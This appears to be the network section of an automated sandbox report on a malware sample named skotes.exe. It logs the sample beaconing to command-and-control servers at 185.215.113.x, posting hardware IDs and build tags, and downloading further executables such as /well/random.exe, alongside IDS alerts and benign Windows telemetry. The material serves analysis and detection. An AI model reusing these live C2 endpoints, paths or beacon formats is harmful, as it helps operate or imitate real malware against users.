00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000332001&unit=246122658369
                                Source: global trafficHTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.103
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 41 44 45 33 35 43 45 33 41 33 33 39 37 33 35 34 34 31 38 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="hwid"53ADE35CE3A33973544187------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build"doma------CFHDBFIEGIDGIECBKJEC--
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000336001&unit=246122658369
                                Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000349001&unit=246122658369
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 41 44 45 33 35 43 45 33 41 33 33 39 37 33 35 34 34 31 38 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 2d 2d 0d 0a Data Ascii: ------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="hwid"53ADE35CE3A33973544187------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="build"doma------AEBKKECBGIIJJKECGIJE--
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 41 44 45 33 35 43 45 33 41 33 33 39 37 33 35 34 34 31 38 37 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 2d 2d 0d 0a Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="hwid"53ADE35CE3A33973544187------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build"doma------GIDBKKKKKFBGDGDHIDBG--
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                                Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
                                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                                Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49810 -> 185.215.113.103:80
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49842 -> 185.215.113.103:80
                                Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49842 -> 185.215.113.103:80
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49879 -> 185.215.113.103:80
                                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DABE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,5_2_00DABE30
                                Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7xNGWLB7eDUzHSk&MD=4dvuXYOy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                                Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7xNGWLB7eDUzHSk&MD=4dvuXYOy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                                Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
